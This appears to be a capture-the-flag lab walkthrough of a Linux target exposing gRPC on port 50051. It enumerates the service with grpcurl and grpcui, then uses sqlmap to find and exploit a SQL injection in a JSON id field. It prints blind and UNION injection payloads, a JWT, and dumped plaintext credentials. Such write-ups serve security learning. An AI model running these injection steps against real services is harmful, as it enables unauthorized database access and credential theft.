Nmap scan report for 10.10.11.214
Host is up (0.11s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 91bf44edea1e3224301f532cea71e5ef (RSA)
| 256 8486a6e204abdff71d456ccf395809de (ECDSA)
|_ 256 1aa89572515e8e3cf180f542fd0a281c (ED25519)
50051/tcp open unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at <https://nmap.org/cgi-bin/submit.cgi?new-service> :
~~~~~
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5.0
OS details: Linux 5.0
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 110.41 ms 10.10.14.1
2 110.43 ms 10.10.11.214
OS and Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 47.67 seconds
根据结果判断,除了一个22-ssh,50051端口上应该为grpc服务
使用grpcurl进行连接:
┌─[✗]─[randark@randark-Parrot]─[~]
└──╼ $grpcurl 10.10.11.214:50051 list
Failed to dial target host "10.10.11.214:50051": tls: first record does not look like a TLS handshake
┌─[✗]─[randark@randark-Parrot]─[~]
└──╼ $grpcurl -plaintext 10.10.11.214:50051 list
SimpleApp
grpc.reflection.v1alpha.ServerReflection
┌─[randark@randark-Parrot]─[~]
└──╼ $grpcurl -plaintext 10.10.11.214:50051 list SimpleApp
SimpleApp.LoginUser
SimpleApp.RegisterUser
SimpleApp.getInfo
继续尝试使用grpcui进行连接:
GitHub - fullstorydev/grpcui: An interactive web UI for gRPC, along the lines of postman
┌─[randark@randark-Parrot]─[~]
└──╼ $grpcui -plaintext 10.10.11.214:50051
gRPC Web UI available at <http://127.0.0.1:43237/>
通过三种方法的交互,可以得到:
进而尝试admin账户是否存在:
获得admin账户权限后,基于grpc的原始服务已经没有任何深入点了,于是尝试挖掘是否存在注入点
POST /invoke/SimpleApp.getInfo HTTP/1.1
Host: 127.0.0.1:37855
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: <http://127.0.0.1:37855/>
Content-Type: application/json
x-grpcui-csrf-token: JoOCYuunUHhbCo-GeeuQKXx3BkC9htbeyIbIT69Rgvs
X-Requested-With: XMLHttpRequest
Content-Length: 193
Origin: <http://127.0.0.1:37855>
DNT: 1
Connection: close
Cookie: _grpcui_csrf_token=JoOCYuunUHhbCo-GeeuQKXx3BkC9htbeyIbIT69Rgvs
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
{"metadata":[{"name":"token","value":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2OTYzOTczODR9.c2T7nGsMT6cqVmeFsMOI4S2pHBqQEoJ1ybA4t7tXRw0"}],"data":[{"id":"143"}]}
┌─[✗]─[randark@randark-Parrot]─[~]
└──╼ $sqlmap -r sqlmap.txt
___
__H__
___ ___[']_____ ___ ___ {1.6.12#stable}
|_ -| . [.] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| <https://sqlmap.org>
~~~
(custom) POST parameter 'JSON id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 193 HTTP(s) requests:
---
Parameter: JSON id ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: {"metadata":[{"name":"token","value":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2OTYzOTczODR9.c2T7nGsMT6cqVmeFsMOI4S2pHBqQEoJ1ybA4t7tXRw0"}],"data":[{"id":"143 AND 6594=6594"}]}
Type: time-based blind
Title: SQLite > 2.0 AND time-based blind (heavy query)
Payload: {"metadata":[{"name":"token","value":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2OTYzOTczODR9.c2T7nGsMT6cqVmeFsMOI4S2pHBqQEoJ1ybA4t7tXRw0"}],"data":[{"id":"143 AND 2170=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2))))"}]}
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: {"metadata":[{"name":"token","value":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2OTYzOTczODR9.c2T7nGsMT6cqVmeFsMOI4S2pHBqQEoJ1ybA4t7tXRw0"}],"data":[{"id":"-8393 UNION ALL SELECT CHAR(113,106,120,118,113)||CHAR(103,120,113,102,67,112,69,79,75,84,80,83,118,119,108,88,108,85,111,69,65,98,87,78,113,76,80,71,83,109,97,113,107,98,101,109,101,102,98,97)||CHAR(113,113,113,98,113)-- Fjog"}]}
---
[10:44:28] [INFO] the back-end DBMS is SQLite
back-end DBMS: SQLite
[10:44:28] [INFO] fetched data logged to text files under '/home/randark/.local/share/sqlmap/output/127.0.0.1'
[10:44:28] [WARNING] your sqlmap version is outdated
于是开始进行数据库拖库:
┌─[✗]─[randark@randark-Parrot]─[~]
└──╼ $sqlmap -r sqlmap.txt --batch --dump
[10:45:38] [INFO] fetching tables for database: 'SQLite_masterdb'
[10:45:38] [INFO] fetching columns for table 'messages'
[10:45:39] [INFO] fetching entries for table 'messages'
Database: <current>
Table: messages
[1 entry]
+-----+-------------------+----------+
| id | message | username |
+-----+-------------------+----------+
| 143 | Will update soon. | admin |
+-----+-------------------+----------+
[10:45:39] [INFO] fetching columns for table 'accounts'
[10:45:39] [INFO] fetching entries for table 'accounts'
Database: <current>
Table: accounts
[2 entries]
+------------------------+----------+
| password | username |
+------------------------+----------+
| admin | admin |
| HereIsYourPassWord1431 | sau |
+------------------------+----------+